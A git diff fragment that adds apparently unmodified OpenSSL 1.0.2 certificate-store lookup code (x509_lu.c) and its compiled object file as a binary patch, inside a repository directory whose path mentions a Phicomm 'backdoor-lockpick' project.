+int X509_LOOKUP_shutdown(X509_LOOKUP *ctx)
+{
+    if (ctx->method == NULL)
+        return 0;
+    if (ctx->method->shutdown != NULL)
+        return ctx->method->shutdown(ctx);
+    else
+        return 1;
+}
+
+int X509_LOOKUP_ctrl(X509_LOOKUP *ctx, int cmd, const char *argc, long argl,
+                     char **ret)
+{
+    if (ctx->method == NULL)
+        return -1;
+    if (ctx->method->ctrl != NULL)
+        return ctx->method->ctrl(ctx, cmd, argc, argl, ret);
+    else
+        return 1;
+}
+
+int X509_LOOKUP_by_subject(X509_LOOKUP *ctx, int type, X509_NAME *name,
+                           X509_OBJECT *ret)
+{
+    if ((ctx->method == NULL) || (ctx->method->get_by_subject == NULL))
+        return X509_LU_FAIL;
+    if (ctx->skip)
+        return 0;
+    return ctx->method->get_by_subject(ctx, type, name, ret);
+}
+
+int X509_LOOKUP_by_issuer_serial(X509_LOOKUP *ctx, int type, X509_NAME *name,
+                                 ASN1_INTEGER *serial, X509_OBJECT *ret)
+{
+    if ((ctx->method == NULL) || (ctx->method->get_by_issuer_serial == NULL))
+        return X509_LU_FAIL;
+    return ctx->method->get_by_issuer_serial(ctx, type, name, serial, ret);
+}
+
+int X509_LOOKUP_by_fingerprint(X509_LOOKUP *ctx, int type,
+                               unsigned char *bytes, int len,
+                               X509_OBJECT *ret)
+{
+    if ((ctx->method == NULL) || (ctx->method->get_by_fingerprint == NULL))
+        return X509_LU_FAIL;
+    return ctx->method->get_by_fingerprint(ctx, type, bytes, len, ret);
+}
+
+int X509_LOOKUP_by_alias(X509_LOOKUP *ctx, int type, char *str, int len,
+                         X509_OBJECT *ret)
+{
+    if ((ctx->method == NULL) || (ctx->method->get_by_alias == NULL))
+        return X509_LU_FAIL;
+    return ctx->method->get_by_alias(ctx, type, str, len, ret);
+}
+
+static int x509_object_cmp(const X509_OBJECT *const *a,
+                           const X509_OBJECT *const *b)
+{
+    int ret;
+
+    ret = ((*a)->type - (*b)->type);
+    if (ret)
+        return ret;
+    switch ((*a)->type) {
+    case X509_LU_X509:
+        ret = X509_subject_name_cmp((*a)->data.x509, (*b)->data.x509);
+        break;
+    case X509_LU_CRL:
+        ret = X509_CRL_cmp((*a)->data.crl, (*b)->data.crl);
+        break;
+    default:
+        /* abort(); */
+        return 0;
+    }
+    return ret;
+}
+
+X509_STORE *X509_STORE_new(void)
+{
+    X509_STORE *ret;
+
+    if ((ret = (X509_STORE *)OPENSSL_malloc(sizeof(X509_STORE))) == NULL)
+        return NULL;
+    ret->objs = sk_X509_OBJECT_new(x509_object_cmp);
+    ret->cache = 1;
+    ret->get_cert_methods = sk_X509_LOOKUP_new_null();
+    ret->verify = 0;
+    ret->verify_cb = 0;
+
+    if ((ret->param = X509_VERIFY_PARAM_new()) == NULL)
+        return NULL;
+
+    ret->get_issuer = 0;
+    ret->check_issued = 0;
+    ret->check_revocation = 0;
+    ret->get_crl = 0;
+    ret->check_crl = 0;
+    ret->cert_crl = 0;
+    ret->lookup_certs = 0;
+    ret->lookup_crls = 0;
+    ret->cleanup = 0;
+
+    if (!CRYPTO_new_ex_data(CRYPTO_EX_INDEX_X509_STORE, ret, &ret->ex_data)) {
+        sk_X509_OBJECT_free(ret->objs);
+        OPENSSL_free(ret);
+        return NULL;
+    }
+
+    ret->references = 1;
+    return ret;
+}
+
+static void cleanup(X509_OBJECT *a)
+{
+    if (a->type == X509_LU_X509) {
+        X509_free(a->data.x509);
+    } else if (a->type == X509_LU_CRL) {
+        X509_CRL_free(a->data.crl);
+    } else {
+        /* abort(); */
+    }
+
+    OPENSSL_free(a);
+}
+
+void X509_STORE_free(X509_STORE *vfy)
+{
+    int i;
+    STACK_OF(X509_LOOKUP) *sk;
+    X509_LOOKUP *lu;
+
+    if (vfy == NULL)
+        return;
+
+    i = CRYPTO_add(&vfy->references, -1, CRYPTO_LOCK_X509_STORE);
+#ifdef REF_PRINT
+    REF_PRINT("X509_STORE", vfy);
+#endif
+    if (i > 0)
+        return;
+#ifdef REF_CHECK
+    if (i < 0) {
+        fprintf(stderr, "X509_STORE_free, bad reference count\n");
+        abort();                /* ok */
+    }
+#endif
+
+    sk = vfy->get_cert_methods;
+    for (i = 0; i < sk_X509_LOOKUP_num(sk); i++) {
+        lu = sk_X509_LOOKUP_value(sk, i);
+        X509_LOOKUP_shutdown(lu);
+        X509_LOOKUP_free(lu);
+    }
+    sk_X509_LOOKUP_free(sk);
+    sk_X509_OBJECT_pop_free(vfy->objs, cleanup);
+
+    CRYPTO_free_ex_data(CRYPTO_EX_INDEX_X509_STORE, vfy, &vfy->ex_data);
+    if (vfy->param)
+        X509_VERIFY_PARAM_free(vfy->param);
+    OPENSSL_free(vfy);
+}
+
+X509_LOOKUP *X509_STORE_add_lookup(X509_STORE *v, X509_LOOKUP_METHOD *m)
+{
+    int i;
+    STACK_OF(X509_LOOKUP) *sk;
+    X509_LOOKUP *lu;
+
+    sk = v->get_cert_methods;
+    for (i = 0; i < sk_X509_LOOKUP_num(sk); i++) {
+        lu = sk_X509_LOOKUP_value(sk, i);
+        if (m == lu->method) {
+            return lu;
+        }
+    }
+    /* a new one */
+    lu = X509_LOOKUP_new(m);
+    if (lu == NULL)
+        return NULL;
+    else {
+        lu->store_ctx = v;
+        if (sk_X509_LOOKUP_push(v->get_cert_methods, lu))
+            return lu;
+        else {
+            X509_LOOKUP_free(lu);
+            return NULL;
+        }
+    }
+}
+
+int X509_STORE_get_by_subject(X509_STORE_CTX *vs, int type, X509_NAME *name,
+                              X509_OBJECT *ret)
+{
+    X509_STORE *ctx = vs->ctx;
+    X509_LOOKUP *lu;
+    X509_OBJECT stmp, *tmp;
+    int i, j;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_X509_STORE);
+    tmp = X509_OBJECT_retrieve_by_subject(ctx->objs, type, name);
+    CRYPTO_w_unlock(CRYPTO_LOCK_X509_STORE);
+
+    if (tmp == NULL || type == X509_LU_CRL) {
+        for (i = vs->current_method;
+             i < sk_X509_LOOKUP_num(ctx->get_cert_methods); i++) {
+            lu = sk_X509_LOOKUP_value(ctx->get_cert_methods, i);
+            j = X509_LOOKUP_by_subject(lu, type, name, &stmp);
+            if (j < 0) {
+                vs->current_method = j;
+                return j;
+            } else if (j) {
+                tmp = &stmp;
+                break;
+            }
+        }
+        vs->current_method = 0;
+        if (tmp == NULL)
+            return 0;
+    }
+
+/*- if (ret->data.ptr != NULL)
+            X509_OBJECT_free_contents(ret); */
+
+    ret->type = tmp->type;
+    ret->data.ptr = tmp->data.ptr;
+
+    X509_OBJECT_up_ref_count(ret);
+
+    return 1;
+}
+
+int X509_STORE_add_cert(X509_STORE *ctx, X509 *x)
+{
+    X509_OBJECT *obj;
+    int ret = 1;
+
+    if (x == NULL)
+        return 0;
+    obj = (X509_OBJECT *)OPENSSL_malloc(sizeof(X509_OBJECT));
+    if (obj == NULL) {
+        X509err(X509_F_X509_STORE_ADD_CERT, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    obj->type = X509_LU_X509;
+    obj->data.x509 = x;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_X509_STORE);
+
+    X509_OBJECT_up_ref_count(obj);
+
+    if (X509_OBJECT_retrieve_match(ctx->objs, obj)) {
+        X509_OBJECT_free_contents(obj);
+        OPENSSL_free(obj);
+        X509err(X509_F_X509_STORE_ADD_CERT,
+                X509_R_CERT_ALREADY_IN_HASH_TABLE);
+        ret = 0;
+    } else
+        sk_X509_OBJECT_push(ctx->objs, obj);
+
+    CRYPTO_w_unlock(CRYPTO_LOCK_X509_STORE);
+
+    return ret;
+}
+
+int X509_STORE_add_crl(X509_STORE *ctx, X509_CRL *x)
+{
+    X509_OBJECT *obj;
+    int ret = 1;
+
+    if (x == NULL)
+        return 0;
+    obj = (X509_OBJECT *)OPENSSL_malloc(sizeof(X509_OBJECT));
+    if (obj == NULL) {
+        X509err(X509_F_X509_STORE_ADD_CRL, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    obj->type = X509_LU_CRL;
+    obj->data.crl = x;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_X509_STORE);
+
+    X509_OBJECT_up_ref_count(obj);
+
+    if (X509_OBJECT_retrieve_match(ctx->objs, obj)) {
+        X509_OBJECT_free_contents(obj);
+        OPENSSL_free(obj);
+        X509err(X509_F_X509_STORE_ADD_CRL, X509_R_CERT_ALREADY_IN_HASH_TABLE);
+        ret = 0;
+    } else
+        sk_X509_OBJECT_push(ctx->objs, obj);
+
+    CRYPTO_w_unlock(CRYPTO_LOCK_X509_STORE);
+
+    return ret;
+}
+
+void X509_OBJECT_up_ref_count(X509_OBJECT *a)
+{
+    switch (a->type) {
+    case X509_LU_X509:
+        CRYPTO_add(&a->data.x509->references, 1, CRYPTO_LOCK_X509);
+        break;
+    case X509_LU_CRL:
+        CRYPTO_add(&a->data.crl->references, 1, CRYPTO_LOCK_X509_CRL);
+        break;
+    }
+}
+
+void X509_OBJECT_free_contents(X509_OBJECT *a)
+{
+    switch (a->type) {
+    case X509_LU_X509:
+        X509_free(a->data.x509);
+        break;
+    case X509_LU_CRL:
+        X509_CRL_free(a->data.crl);
+        break;
+    }
+}
+
+static int x509_object_idx_cnt(STACK_OF(X509_OBJECT) *h, int type,
+                               X509_NAME *name, int *pnmatch)
+{
+    X509_OBJECT stmp;
+    X509 x509_s;
+    X509_CINF cinf_s;
+    X509_CRL crl_s;
+    X509_CRL_INFO crl_info_s;
+    int idx;
+
+    stmp.type = type;
+    switch (type) {
+    case X509_LU_X509:
+        stmp.data.x509 = &x509_s;
+        x509_s.cert_info = &cinf_s;
+        cinf_s.subject = name;
+        break;
+    case X509_LU_CRL:
+        stmp.data.crl = &crl_s;
+        crl_s.crl = &crl_info_s;
+        crl_info_s.issuer = name;
+        break;
+    default:
+        /* abort(); */
+        return -1;
+    }
+
+    idx = sk_X509_OBJECT_find(h, &stmp);
+    if (idx >= 0 && pnmatch) {
+        int tidx;
+        const X509_OBJECT *tobj, *pstmp;
+        *pnmatch = 1;
+        pstmp = &stmp;
+        for (tidx = idx + 1; tidx < sk_X509_OBJECT_num(h); tidx++) {
+            tobj = sk_X509_OBJECT_value(h, tidx);
+            if (x509_object_cmp(&tobj, &pstmp))
+                break;
+            (*pnmatch)++;
+        }
+    }
+    return idx;
+}
+
+int X509_OBJECT_idx_by_subject(STACK_OF(X509_OBJECT) *h, int type,
+                               X509_NAME *name)
+{
+    return x509_object_idx_cnt(h, type, name, NULL);
+}
+
+X509_OBJECT *X509_OBJECT_retrieve_by_subject(STACK_OF(X509_OBJECT) *h,
+                                             int type, X509_NAME *name)
+{
+    int idx;
+    idx = X509_OBJECT_idx_by_subject(h, type, name);
+    if (idx == -1)
+        return NULL;
+    return sk_X509_OBJECT_value(h, idx);
+}
+
+STACK_OF(X509) *X509_STORE_get1_certs(X509_STORE_CTX *ctx, X509_NAME *nm)
+{
+    int i, idx, cnt;
+    STACK_OF(X509) *sk;
+    X509 *x;
+    X509_OBJECT *obj;
+    sk = sk_X509_new_null();
+    CRYPTO_w_lock(CRYPTO_LOCK_X509_STORE);
+    idx = x509_object_idx_cnt(ctx->ctx->objs, X509_LU_X509, nm, &cnt);
+    if (idx < 0) {
+        /*
+         * Nothing found in cache: do lookup to possibly add new objects to
+         * cache
+         */
+        X509_OBJECT xobj;
+        CRYPTO_w_unlock(CRYPTO_LOCK_X509_STORE);
+        if (!X509_STORE_get_by_subject(ctx, X509_LU_X509, nm, &xobj)) {
+            sk_X509_free(sk);
+            return NULL;
+        }
+        X509_OBJECT_free_contents(&xobj);
+        CRYPTO_w_lock(CRYPTO_LOCK_X509_STORE);
+        idx = x509_object_idx_cnt(ctx->ctx->objs, X509_LU_X509, nm, &cnt);
+        if (idx < 0) {
+            CRYPTO_w_unlock(CRYPTO_LOCK_X509_STORE);
+            sk_X509_free(sk);
+            return NULL;
+        }
+    }
+    for (i = 0; i < cnt; i++, idx++) {
+        obj = sk_X509_OBJECT_value(ctx->ctx->objs, idx);
+        x = obj->data.x509;
+        CRYPTO_add(&x->references, 1, CRYPTO_LOCK_X509);
+        if (!sk_X509_push(sk, x)) {
+            CRYPTO_w_unlock(CRYPTO_LOCK_X509_STORE);
+            X509_free(x);
+            sk_X509_pop_free(sk, X509_free);
+            return NULL;
+        }
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_X509_STORE);
+    return sk;
+
+}
+
+STACK_OF(X509_CRL) *X509_STORE_get1_crls(X509_STORE_CTX *ctx, X509_NAME *nm)
+{
+    int i, idx, cnt;
+    STACK_OF(X509_CRL) *sk;
+    X509_CRL *x;
+    X509_OBJECT *obj, xobj;
+    sk = sk_X509_CRL_new_null();
+    CRYPTO_w_lock(CRYPTO_LOCK_X509_STORE);
+    /* Check cache first */
+    idx = x509_object_idx_cnt(ctx->ctx->objs, X509_LU_CRL, nm, &cnt);
+
+    /*
+     * Always do lookup to possibly add new CRLs to cache
+     */
+    CRYPTO_w_unlock(CRYPTO_LOCK_X509_STORE);
+    if (!X509_STORE_get_by_subject(ctx, X509_LU_CRL, nm, &xobj)) {
+        sk_X509_CRL_free(sk);
+        return NULL;
+    }
+    X509_OBJECT_free_contents(&xobj);
+    CRYPTO_w_lock(CRYPTO_LOCK_X509_STORE);
+    idx = x509_object_idx_cnt(ctx->ctx->objs, X509_LU_CRL, nm, &cnt);
+    if (idx < 0) {
+        CRYPTO_w_unlock(CRYPTO_LOCK_X509_STORE);
+        sk_X509_CRL_free(sk);
+        return NULL;
+    }
+
+    for (i = 0; i < cnt; i++, idx++) {
+        obj = sk_X509_OBJECT_value(ctx->ctx->objs, idx);
+        x = obj->data.crl;
+        CRYPTO_add(&x->references, 1, CRYPTO_LOCK_X509_CRL);
+        if (!sk_X509_CRL_push(sk, x)) {
+            CRYPTO_w_unlock(CRYPTO_LOCK_X509_STORE);
+            X509_CRL_free(x);
+            sk_X509_CRL_pop_free(sk, X509_CRL_free);
+            return NULL;
+        }
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_X509_STORE);
+    return sk;
+}
+
+X509_OBJECT *X509_OBJECT_retrieve_match(STACK_OF(X509_OBJECT) *h,
+                                        X509_OBJECT *x)
+{
+    int idx, i;
+    X509_OBJECT *obj;
+    idx = sk_X509_OBJECT_find(h, x);
+    if (idx == -1)
+        return NULL;
+    if ((x->type != X509_LU_X509) && (x->type != X509_LU_CRL))
+        return sk_X509_OBJECT_value(h, idx);
+    for (i = idx; i < sk_X509_OBJECT_num(h); i++) {
+        obj = sk_X509_OBJECT_value(h, i);
+        if (x509_object_cmp
+            ((const X509_OBJECT **)&obj, (const X509_OBJECT **)&x))
+            return NULL;
+        if (x->type == X509_LU_X509) {
+            if (!X509_cmp(obj->data.x509, x->data.x509))
+                return obj;
+        } else if (x->type == X509_LU_CRL) {
+            if (!X509_CRL_match(obj->data.crl, x->data.crl))
+                return obj;
+        } else
+            return obj;
+    }
+    return NULL;
+}
+
+/*-
+ * Try to get issuer certificate from store. Due to limitations
+ * of the API this can only retrieve a single certificate matching
+ * a given subject name. However it will fill the cache with all
+ * matching certificates, so we can examine the cache for all
+ * matches.
+ *
+ * Return values are:
+ *  1 lookup successful.
+ *  0 certificate not found.
+ * -1 some other error.
+ */
+int X509_STORE_CTX_get1_issuer(X509 **issuer, X509_STORE_CTX *ctx, X509 *x)
+{
+    X509_NAME *xn;
+    X509_OBJECT obj, *pobj;
+    int i, ok, idx, ret;
+    xn = X509_get_issuer_name(x);
+    ok = X509_STORE_get_by_subject(ctx, X509_LU_X509, xn, &obj);
+    if (ok != X509_LU_X509) {
+        if (ok == X509_LU_RETRY) {
+            X509_OBJECT_free_contents(&obj);
+            X509err(X509_F_X509_STORE_CTX_GET1_ISSUER, X509_R_SHOULD_RETRY);
+            return -1;
+        } else if (ok != X509_LU_FAIL) {
+            X509_OBJECT_free_contents(&obj);
+            /* not good :-(, break anyway */
+            return -1;
+        }
+        return 0;
+    }
+    /* If certificate matches all OK */
+    if (ctx->check_issued(ctx, x, obj.data.x509)) {
+        *issuer = obj.data.x509;
+        return 1;
+    }
+    X509_OBJECT_free_contents(&obj);
+
+    /* Else find index of first cert accepted by 'check_issued' */
+    ret = 0;
+    CRYPTO_w_lock(CRYPTO_LOCK_X509_STORE);
+    idx = X509_OBJECT_idx_by_subject(ctx->ctx->objs, X509_LU_X509, xn);
+    if (idx != -1) {            /* should be true as we've had at least one
+                                 * match */
+        /* Look through all matching certs for suitable issuer */
+        for (i = idx; i < sk_X509_OBJECT_num(ctx->ctx->objs); i++) {
+            pobj = sk_X509_OBJECT_value(ctx->ctx->objs, i);
+            /* See if we've run past the matches */
+            if (pobj->type != X509_LU_X509)
+                break;
+            if (X509_NAME_cmp(xn, X509_get_subject_name(pobj->data.x509)))
+                break;
+            if (ctx->check_issued(ctx, x, pobj->data.x509)) {
+                *issuer = pobj->data.x509;
+                X509_OBJECT_up_ref_count(pobj);
+                ret = 1;
+                break;
+            }
+        }
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_X509_STORE);
+    return ret;
+}
+
+int X509_STORE_set_flags(X509_STORE *ctx, unsigned long flags)
+{
+    return X509_VERIFY_PARAM_set_flags(ctx->param, flags);
+}
+
+int X509_STORE_set_depth(X509_STORE *ctx, int depth)
+{
+    X509_VERIFY_PARAM_set_depth(ctx->param, depth);
+    return 1;
+}
+
+int X509_STORE_set_purpose(X509_STORE *ctx, int purpose)
+{
+    return X509_VERIFY_PARAM_set_purpose(ctx->param, purpose);
+}
+
+int X509_STORE_set_trust(X509_STORE *ctx, int trust)
+{
+    return X509_VERIFY_PARAM_set_trust(ctx->param, trust);
+}
+
+int X509_STORE_set1_param(X509_STORE *ctx, X509_VERIFY_PARAM *param)
+{
+    return X509_VERIFY_PARAM_set1(ctx->param, param);
+}
+
+void X509_STORE_set_verify_cb(X509_STORE *ctx,
+                              int (*verify_cb) (int, X509_STORE_CTX *))
+{
+    ctx->verify_cb = verify_cb;
+}
+
+void X509_STORE_set_lookup_crls_cb(X509_STORE *ctx,
+                                   STACK_OF(X509_CRL) *(*cb) (X509_STORE_CTX
+                                                              *ctx,
+                                                              X509_NAME *nm))
+{
+    ctx->lookup_crls = cb;
+}
+
+X509_STORE *X509_STORE_CTX_get0_store(X509_STORE_CTX *ctx)
+{
+    return ctx->ctx;
+}
+
+IMPLEMENT_STACK_OF(X509_LOOKUP)
+
+IMPLEMENT_STACK_OF(X509_OBJECT)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_lu.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_lu.o
new file mode 100644
index 0000000000000000000000000000000000000000..7d59eae2f0877229ab3f0677de222f8aad67f377
GIT binary patch
literal 14120
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
